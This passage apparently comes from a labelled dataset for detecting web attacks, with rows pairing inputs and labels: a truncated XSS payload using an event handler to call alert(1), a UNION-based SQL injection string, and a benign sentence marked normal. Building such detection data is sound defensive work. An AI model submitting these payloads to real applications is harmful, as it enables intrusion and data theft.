ontransitionend=alert(1)></multicol>",1,XSS,862 "-4694' ) where 1501 = 1501 union all select 1501,1501,1501,1501,1501,1501#",2,SQLi,15819 I need to select the right book to read.,3,normal,23696